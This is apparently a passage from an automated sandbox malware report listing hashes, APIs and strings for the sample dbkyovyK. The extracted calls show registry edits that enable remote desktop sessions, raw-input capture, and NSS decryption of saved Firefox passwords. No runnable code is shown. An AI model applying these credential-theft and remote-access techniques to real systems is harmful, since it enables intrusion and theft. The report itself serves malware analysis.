Opcode Fuzzy Hash: a979bbaebc897a1b1216ef6414ba903c4b9985fe213b639caf650fb02d8c5e8d
Instruction Fuzzy Hash: 1F21847A901259EFDB01DF59C886BFEBBB5EF14742F908015F905B76A0C734A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3DACB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafd9311ffb4b8a820f99c7b8f03679f0e4b0b9dcd38e3c410cbdc02f7917113
Instruction ID: ad648d436d87ed5728220889a37c57edfda33c46b8bb315275f9e23b6a9f6807
Opcode Fuzzy Hash: cafd9311ffb4b8a820f99c7b8f03679f0e4b0b9dcd38e3c410cbdc02f7917113
Instruction Fuzzy Hash: B7219375516684CFC350CF24C446B9677F4FB497A2F40893AE899DB6C0DB30A542CF52

Uniqueness

Uniqueness Score: -1.00%

Function 39D3CCC6 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44cc56bc816ffb6be87a43cc95b00ed5ae9526bc511639fd1fdf1858d167632
Instruction ID: f9cd39ffd52b161bfa66b762da9cf6ac12c5025f4676b48903e011f43f4e6946
Opcode Fuzzy Hash: a44cc56bc816ffb6be87a43cc95b00ed5ae9526bc511639fd1fdf1858d167632
Instruction Fuzzy Hash: 8B118C76A01148EFC701DF99C885DAEFBB9FF88751B548069F805A7261D7319C42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3BFBA Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44cc56bc816ffb6be87a43cc95b00ed5ae9526bc511639fd1fdf1858d167632
Instruction ID: d28888bd3c39c05ba10c8540f733ccb9a2e24466ad710aec129f2d7cc308d063
Opcode Fuzzy Hash: a44cc56bc816ffb6be87a43cc95b00ed5ae9526bc511639fd1fdf1858d167632
Instruction Fuzzy Hash: A8119176A01148EFC711DF99C885DBEFBB9FF88751B548069E805A7162C7319C42CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3C383 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958ab39222040376f064227cc55d282d8715eb67bda3b9eb463247c7af7fbcda
Instruction ID: f8fdaf1a44e6379f1525d0de6b22b28c69da4f9d9d0552f1d4e4bafa5ce93c07
Opcode Fuzzy Hash: 958ab39222040376f064227cc55d282d8715eb67bda3b9eb463247c7af7fbcda
Instruction Fuzzy Hash: 4611A136A02158EFCB01DFA5CC86DEEBBB8FF88751B548458E801B3520D731AD02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3B3D9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85eb02890db8947ff386d0a0c2278748b23068ef51f99d964690fe9f644a419f
Instruction ID: b2c1bd3e07194ed49fd94eea473410ab2ecd292b1b7058d6b1eaf74cc487c2f0
Opcode Fuzzy Hash: 85eb02890db8947ff386d0a0c2278748b23068ef51f99d964690fe9f644a419f
Instruction Fuzzy Hash: 25015E36901098EFCB11DF89CC85CEEBBB9FB89742B508119F401B7561D7359D11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3B93C Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 900db6abc88b7ae7de20206a36d76a208262c4007e188e6f49a26fabdbffb2e4
Instruction ID: c4696bbefaf671079da5d92f699472b10f2d2edf1f6716b53cd5b10069092fe2
Opcode Fuzzy Hash: 900db6abc88b7ae7de20206a36d76a208262c4007e188e6f49a26fabdbffb2e4
Instruction Fuzzy Hash: 50011E75612600EFDB099F04C88AB7777AAEF94322F1544A9EC119B346C7B4ED12CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 39D3FE00 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 760b6c76c010a421ab4f61dfa8fdf22a523f34300ddc6543a0bf30051dca4bea
Instruction ID: 55defa212616288fabaa322c509cc12c1379c081b42b619bd1751b9c8aa8e932
Opcode Fuzzy Hash: 760b6c76c010a421ab4f61dfa8fdf22a523f34300ddc6543a0bf30051dca4bea
Instruction Fuzzy Hash: 9401807590224DEBF7019BBCC68AA5C37B4AB0CB82FC04521E451BED92CB34EA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 39D3E058 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397574e042efd59c6a8794c94535062f1f631e195398b957a8aa7770ebb0b710
Instruction ID: f37b241c7986af51f2a19dd6f01caba4486285dcb8e3a7e1b9fca3a1f84c8ebd
Opcode Fuzzy Hash: 397574e042efd59c6a8794c94535062f1f631e195398b957a8aa7770ebb0b710
Instruction Fuzzy Hash: D6014735A0124DEBEB10DF24C902BAAB3F8FF48751F400566E851E31C0DB709A42C761

Uniqueness

Uniqueness Score: -1.00%

Function 39D28BF0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b867e8639781997adcd1353bf9e3671dae61c832df5c005b5b8d6b8b092364cd
Instruction ID: 32f4c56d3c4ff6407decfb6c9a64eb7f46c695bde9d6872ca71096e9745268b3
Opcode Fuzzy Hash: b867e8639781997adcd1353bf9e3671dae61c832df5c005b5b8d6b8b092364cd
Instruction Fuzzy Hash: C0F09635102644DFC708DB14D41AEAA73A9EFC4795F04443DE54B57980CF74B842DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D32BC0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f534c1a40157644e1bfd2bec9868750b2cd753f8fa8905327d1d9be4ccb9de9b
Instruction ID: 305f772fa9f29d3057830ba301a65e58bc2f89911a7dfc77fe8e6d8485001493
Opcode Fuzzy Hash: f534c1a40157644e1bfd2bec9868750b2cd753f8fa8905327d1d9be4ccb9de9b
Instruction Fuzzy Hash: 53F07FB5D0020EAFDB40DF98C446BAEBBF4EB08315F108016E914E7241D7749A518FA1

Uniqueness

Uniqueness Score: -1.00%

Function 39D32B70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9d72ceb37b13c8a4a4d8d9d9be5858fc27490aa9e362597ff135b1ebae95a3d
Instruction ID: ab446559d97c06557533fdf01701efcf3f384602fdfddd760d1b730d4ad2edd3
Opcode Fuzzy Hash: f9d72ceb37b13c8a4a4d8d9d9be5858fc27490aa9e362597ff135b1ebae95a3d
Instruction Fuzzy Hash: 24F0A57590428E9BDB14DFA5D406AAFBBB4EF08305F00801AA865E7281D678D6018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 39D24D30 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 384b9b80d6461f3a1479c627b80175ed3cf956adbdbc71855bf0647d11d73ebf
Instruction ID: ce1ce3e48e70ae21b895c90f2f9a0703ab50a8472541958f46cf165198999eed
Opcode Fuzzy Hash: 384b9b80d6461f3a1479c627b80175ed3cf956adbdbc71855bf0647d11d73ebf
Instruction Fuzzy Hash: C8E08CB55113818EF7208F62E5067222394D7C2AAEF508035D8C3C1990DB34E482C611

Uniqueness

Uniqueness Score: -1.00%

Function 004143F4 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6b25ad97b4573fa23ff47979e8298134cfd3c654daa624eb9f1e4e6979c0a6
Instruction ID: 2a3fca1f9ff97ce48e860c496648ff6c1ee222aab861e332269bdf2d55fb0082
Opcode Fuzzy Hash: be6b25ad97b4573fa23ff47979e8298134cfd3c654daa624eb9f1e4e6979c0a6
Instruction Fuzzy Hash: CEE0EC322145608BCB61DB19E844B96B3F5EBD077072A057AE49AA7651C328FC82CA58

Uniqueness

Uniqueness Score: -1.00%

Function 39CDBBA0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e926e15ed2959cc9b176e2565199654d19a90b3fdc51bca4650df24611514b
Instruction ID: 60bc339126435b1de13a04fa5662cf9b49c6bf83b580da273e267b2b575633b2
Opcode Fuzzy Hash: 52e926e15ed2959cc9b176e2565199654d19a90b3fdc51bca4650df24611514b
Instruction Fuzzy Hash: E6E08CB2A08654DFDB208F88E80179CBBB0EB48761F10812AE112E22C0C77519018F54

Uniqueness

Uniqueness Score: -1.00%

Function 0041471F Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
Instruction ID: 6a812c31ebd9861defd7918f0452acc54ce7152d3e08e79bcaf62d9884076444
Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
Instruction Fuzzy Hash: 3CD0EA383619408FCB51CF18C684E01B3E4EB49760B0984E1E905CB771D738EC40EA00

Uniqueness

Uniqueness Score: -1.00%

Function 004143ED Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 39CED952 Relevance: 75.4, Strings: 60, Instructions: 409COMMON

Download Yara Rule

Strings

ImmSetOpenStatus, xrefs: 39CEDC8D
ImmGetImeInfoEx, xrefs: 39CEDD6E
ImmSetConversionStatus, xrefs: 39CEDD3C
ImmReleaseContext, xrefs: 39CEDB7A
ImmGetOpenStatus, xrefs: 39CEDDB9
ImmGetCompositionFontA, xrefs: 39CEDBC5
ImmSetCompositionFontW, xrefs: 39CEDBDE
CtfImmNotify, xrefs: 39CEDF24
ImmSetCompositionStringA, xrefs: 39CEDE68
ImmNotifyIME, xrefs: 39CEDC29
ImmPutImeMenuItemsIntoMappedFile, xrefs: 39CEDE36
ImmTranslateMessage, xrefs: 39CEDDEB
ImmEscapeW, xrefs: 39CEDACB
ImmGetCandidateWindow, xrefs: 39CEDCD8
ImmEnumInputContext, xrefs: 39CEDE9A
ImmUnlockImeDpi, xrefs: 39CEDDA0
ImmGetCompositionStringW, xrefs: 39CEDAFD
ImmSetCompositionStringW, xrefs: 39CEDE81
ImmGetConversionStatus, xrefs: 39CEDD23
CtfImmGetCompatibleKeyboardLayout, xrefs: 39CEDF4E
ImmGetProperty, xrefs: 39CEDE4F
ImmSetActiveContext, xrefs: 39CEDDD2
ImmGetCompositionStringA, xrefs: 39CEDAE4
ImmConfigureIMEW, xrefs: 39CEDD0A
ImmSetCompositionWindow, xrefs: 39CEDC10
ImmProcessKey, xrefs: 39CEDE1D
ImmSendIMEMessageExA, xrefs: 39CED9EA
ImmIMPSetIMEW, xrefs: 39CEDA67
ImmSendIMEMessageExW, xrefs: 39CED9D1
ImmIMPGetIMEA, xrefs: 39CEDA1C
ImmUnlockIMC, xrefs: 39CEDC5B
ImmGetContext, xrefs: 39CEDB2F
ImmGetDefaultIMEWnd, xrefs: 39CEDB48
ImmWINNLSGetEnableStatus, xrefs: 39CED9B8
ImmIMPQueryIMEA, xrefs: 39CEDA4E
ImmSystemHandler, xrefs: 39CEDEB3
CtfImmTIMActivate, xrefs: 39CEDECC
ImmIMPQueryIMEW, xrefs: 39CEDA35
ImmEscapeA, xrefs: 39CEDAB2
ImmWINNLSEnableIME, xrefs: 39CED9A4
ImmIMPSetIMEA, xrefs: 39CEDA80
ImmLoadIME, xrefs: 39CEDC74
ImmFreeLayout, xrefs: 39CEDCA6
ImmLockIMC, xrefs: 39CEDC42
ImmLoadLayout, xrefs: 39CEDE04
CtfImmSetDefaultRemoteKeyboardLayout, xrefs: 39CEDF39
CtfImmRestoreToolbarWnd, xrefs: 39CEDEE5
CtfImmHideToolbarWnd, xrefs: 39CEDEFA
ImmSetCandidateWindow, xrefs: 39CEDCF1
ImmActivateLayout, xrefs: 39CEDCBF
ImmRegisterClient, xrefs: 39CEDB93
ImmAssociateContext, xrefs: 39CEDA99
ImmGetCompositionWindow, xrefs: 39CEDB16
ImmSetCompositionFontA, xrefs: 39CEDBF7
ImmSetStatusWindowPos, xrefs: 39CEDD55
ImmIMPGetIMEW, xrefs: 39CEDA03
ImmLockImeDpi, xrefs: 39CEDD87
CtfImmDispatchDefImeMessage, xrefs: 39CEDF0F
ImmGetCompositionFontW, xrefs: 39CEDBAC
ImmIsIME, xrefs: 39CEDB61

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: CtfImmDispatchDefImeMessage$CtfImmGetCompatibleKeyboardLayout$CtfImmHideToolbarWnd$CtfImmNotify$CtfImmRestoreToolbarWnd$CtfImmSetDefaultRemoteKeyboardLayout$CtfImmTIMActivate$ImmActivateLayout$ImmAssociateContext$ImmConfigureIMEW$ImmEnumInputContext$ImmEscapeA$ImmEscapeW$ImmFreeLayout$ImmGetCandidateWindow$ImmGetCompositionFontA$ImmGetCompositionFontW$ImmGetCompositionStringA$ImmGetCompositionStringW$ImmGetCompositionWindow$ImmGetContext$ImmGetConversionStatus$ImmGetDefaultIMEWnd$ImmGetImeInfoEx$ImmGetOpenStatus$ImmGetProperty$ImmIMPGetIMEA$ImmIMPGetIMEW$ImmIMPQueryIMEA$ImmIMPQueryIMEW$ImmIMPSetIMEA$ImmIMPSetIMEW$ImmIsIME$ImmLoadIME$ImmLoadLayout$ImmLockIMC$ImmLockImeDpi$ImmNotifyIME$ImmProcessKey$ImmPutImeMenuItemsIntoMappedFile$ImmRegisterClient$ImmReleaseContext$ImmSendIMEMessageExA$ImmSendIMEMessageExW$ImmSetActiveContext$ImmSetCandidateWindow$ImmSetCompositionFontA$ImmSetCompositionFontW$ImmSetCompositionStringA$ImmSetCompositionStringW$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$ImmSetStatusWindowPos$ImmSystemHandler$ImmTranslateMessage$ImmUnlockIMC$ImmUnlockImeDpi$ImmWINNLSEnableIME$ImmWINNLSGetEnableStatus
API String ID: 0-1021122492
Opcode ID: 90fb1833104b4bd226396a2075b08d0ec4fb40af831324de168ffa8790e58059
Instruction ID: 9b6444257c10d5209370c177ede25baeeeff2c90d9ac73bd3e021859e5d57f52
Opcode Fuzzy Hash: 90fb1833104b4bd226396a2075b08d0ec4fb40af831324de168ffa8790e58059
Instruction Fuzzy Hash: 9AE11175945395EAEF00AFB6A91AAD63BE8BB1D7C3750C459B412F71A0DB30D002CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00410F97 Relevance: 49.4, APIs: 16, Strings: 12, Instructions: 381registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 00414E25: RegCreateKeyExW.ADVAPI32(75A901C0,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,004151F7,?,?), ref: 00414E59
Part of subcall function 00414E25: RegOpenKeyExW.ADVAPI32(75A901C0,?,00000000,?,?,00000000,?,?,?,004151F7,?,?,00020006,00000000,?,?), ref: 00414E74

RegSetValueExW.ADVAPI32(?,00000000,00000000,00000004,?,?,fDenyTSConnections,?,00000004,80000002,?,00020106,00000001,SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC,SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector,SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns), ref: 00411066
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,004120C3,00000000,?,rpdp,rudp), ref: 0041108B
RegCloseKey.ADVAPI32(?,?,00000004,?,?,?,?,?,?,?,?,?,?,004120C3,00000000), ref: 004110C2
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000004,?,?,EnableConcurrentSessions,80000002,?,00020106,00000001,?,00000004), ref: 0041110E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,004120C3,00000000,?,rpdp,rudp), ref: 00411137
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000004,?,?,AllowMultipleTSSessions,80000002,004120C3,00020106,00000001), ref: 00411180
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,004120C3,00000000,?,rpdp,rudp), ref: 004111A9
RegSetValueExW.ADVAPI32(00000003,00000000,00000000,00000001,00000003,?,Name,?,RDPClip,?,00000004,80000002,00000000,00020106,00000001,80000002), ref: 00411274
RegSetValueExW.ADVAPI32(00000003,00000000,00000000,00000004,?,?,Type), ref: 0041129E
RegCloseKey.ADVAPI32(00000003,?,?,?,?,?,?,?,?,?,?,004120C3,00000000,?,rpdp,rudp), ref: 004112F5
RegCloseKey.ADVAPI32(00000003,80000002,?,00020106,00000001,?,?,?,?,?,?,?,?,?,?,004120C3), ref: 0041131D
RegSetValueExW.ADVAPI32(00000003,00000000,00000000,00000004,?,?,Type,00000003,00000004,80000002,?,00020106,00000001), ref: 0041136E
RegCloseKey.ADVAPI32(00000003,?,?,?,?,?,?,?,?,?,?,004120C3,00000000,?,rpdp,rudp), ref: 00411393
RegCloseKey.ADVAPI32(00000003,?,?,?,?,?,?,?,?,?,?,004120C3,00000000,?,rpdp,rudp), ref: 004113B8
RegCloseKey.ADVAPI32(?,80000002,?,00020106,00000001,?,?,?,?,?,?,?,?,?,?,004120C3), ref: 004111F3

Part of subcall function 00406F66: GetProcessHeap.KERNEL32(00000000,?,0040408F,?,00406CD9,00000000,?,00414EA7,?,?,00417742), ref: 00406F69
Part of subcall function 00406F66: RtlFreeHeap.NTDLL(00000000,?,?,00417742), ref: 00406F70

RegCloseKey.ADVAPI32(00000000,80000002,?,00020106,00000001,SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC,SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector,SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core,SYSTEM\CurrentControlSet\Control\Terminal Server,74DF0F00,000001F4), ref: 00411414

Strings

fDenyTSConnections, xrefs: 00411040
Type, xrefs: 0041127E, 00411349
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core, xrefs: 00410FB5
SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector, xrefs: 00410FDC
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC, xrefs: 00410FE9
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00410FC2
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns, xrefs: 00410FCF
Name, xrefs: 0041124A
AllowMultipleTSSessions, xrefs: 0041115B
SYSTEM\CurrentControlSet\Control\Terminal Server, xrefs: 00410FA8
EnableConcurrentSessions, xrefs: 004110E9
RDPClip, xrefs: 00411232

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Close$Value$Heaplstrlen$CreateFreeOpenProcesslstrcpy
String ID: AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$Type$fDenyTSConnections
API String ID: 2726768599-2329005989
Opcode ID: 46943e81cdb3833d7e2e8b40b1018e011d9ce340da01c29281908fb892e8b486
Instruction ID: 3985a37fbc2dfcdcfd46e539b858f79222f5a8b86c3c54f6692f6448e374a0a8
Opcode Fuzzy Hash: 46943e81cdb3833d7e2e8b40b1018e011d9ce340da01c29281908fb892e8b486
Instruction Fuzzy Hash: AFE1E771D4020AABDF14EFA1D891AEEBB75AF44344F10407FE602B62A1DB384A91CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B347 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 303registrywindowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 0040B39D
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040B3BA
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040B3F0
PostQuitMessage.USER32(00000000), ref: 0040B731
RegisterRawInputDevices.USER32 ref: 0040B760

Strings

Unknow, xrefs: 0040B453

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Input$Data$DevicesMessagePostProcQuitRegisterWindow
String ID: Unknow
API String ID: 4053440832-1240069140
Opcode ID: 41639927ecef6cfca774072b1beb2785591009241d4b45eafc84794576f47283
Instruction ID: 3fa8ebb0ad010f54b21a1457b17bf8ea8954b6492e07ebaa173acb6316883c09
Opcode Fuzzy Hash: 41639927ecef6cfca774072b1beb2785591009241d4b45eafc84794576f47283
Instruction Fuzzy Hash: DAC1AF71604201AFC700EF65DC99EAA7BA8FF88304F44893EF546A72A1DB39DD14CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF9D Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,?,00000000), ref: 0040DFCB
SetCurrentDirectoryW.KERNEL32(?,?,00000000), ref: 0040DFD4

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 00404477: wsprintfW.USER32 ref: 00404492

PathFileExistsW.SHLWAPI(0040CD97,.dll,?,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?), ref: 0040E0C2
PathFileExistsW.SHLWAPI(0040CD97,.dll,0000005A,?,0040CD97,?,00000000), ref: 0040E11E
LoadLibraryW.KERNEL32(?,0040CD97,?,00000000), ref: 0040E15D
LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E168
LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E173
LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E17E
LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E189
SetCurrentDirectoryW.KERNEL32(?,?,00000000), ref: 0040E288

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

PK11_FreeSlot, xrefs: 0040E254
.dll, xrefs: 0040E0B3, 0040E10F
PK11_GetInternalKeySlot, xrefs: 0040E1D0
NSS_Shutdown, xrefs: 0040E23E
PK11SDR_Decrypt, xrefs: 0040E1FC
mozglue.dll, xrefs: 0040E03E
msvcp120.dll, xrefs: 0040E025
PK11_CheckUserPassword, xrefs: 0040E228
msvcr, xrefs: 0040E089
PK11_Authenticate, xrefs: 0040E1E6
msvcr120.dll, xrefs: 0040E00C
msvcp, xrefs: 0040E070
PR_GetError, xrefs: 0040E26A
NSSBase64_DecodeBuffer, xrefs: 0040E212
nss3.dll, xrefs: 0040DFF3
NSS_Init, xrefs: 0040E1C0
softokn3.dll, xrefs: 0040E057

Memory Dump Source

